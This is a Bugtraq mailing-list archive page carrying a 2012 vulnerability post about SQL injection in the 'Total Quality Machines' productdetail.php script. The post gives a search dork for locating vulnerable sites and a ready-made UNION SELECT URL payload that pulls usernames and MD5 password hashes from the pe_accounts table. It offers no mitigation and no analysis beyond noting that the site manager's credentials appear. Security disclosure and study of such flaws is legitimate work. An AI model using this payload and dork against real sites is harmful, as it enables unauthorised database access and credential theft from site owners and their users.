[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities
From: CrAzY_CrAcKeR@xxxxxxxxxxxxxxxxxxxxx
Date: Sat, 14 Apr 2012 13:22:57 GMT

##################################################################
# Title : Total Quality Machines (productdetail.php) SQL Injection 
Vulnerabilities  
#
# Discovered By: CrAzY CrAcKeR
#
# Home  : Null
#
# Email : CrAzY_CrAcKeR@xxxxxxxxxxxxxxx
#
# date  : 14/4/2012
#
# d0rk:- "Total Quality Machines"
#       
##################################################################
##################################################################     
#
#            +-+-+-+-+-+-+-+-+-+-+
#         --+CrAzY CrAcKeR+--
#            +-+-+-+-+-+-+-+-+-+-+
#
#
################################################################## 
##################################################################
# Example:-
#  
#  [-] http://www.???.com/productdetail.php?id=(sql)
# 
# [-] Injection code.... ( 
-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts
 )
#     
# [-] 
http://www.???.com/productdetail.php?id=--1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts
#     
# [-]  you see  now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend  A7eb Alwrd
####################################################################

Prev by Date: Slides for "Recent Advances in IPv6 Security" at Hackito Ergo Sum 2012
Next by Date: Mathematica8.0.4 on Linux /tmp/MathLink vulnerability
Previous by thread: Slides for "Recent Advances in IPv6 Security" at Hackito Ergo Sum 2012
Next by thread: Mathematica8.0.4 on Linux /tmp/MathLink vulnerability
Index(es):
- Date
- Thread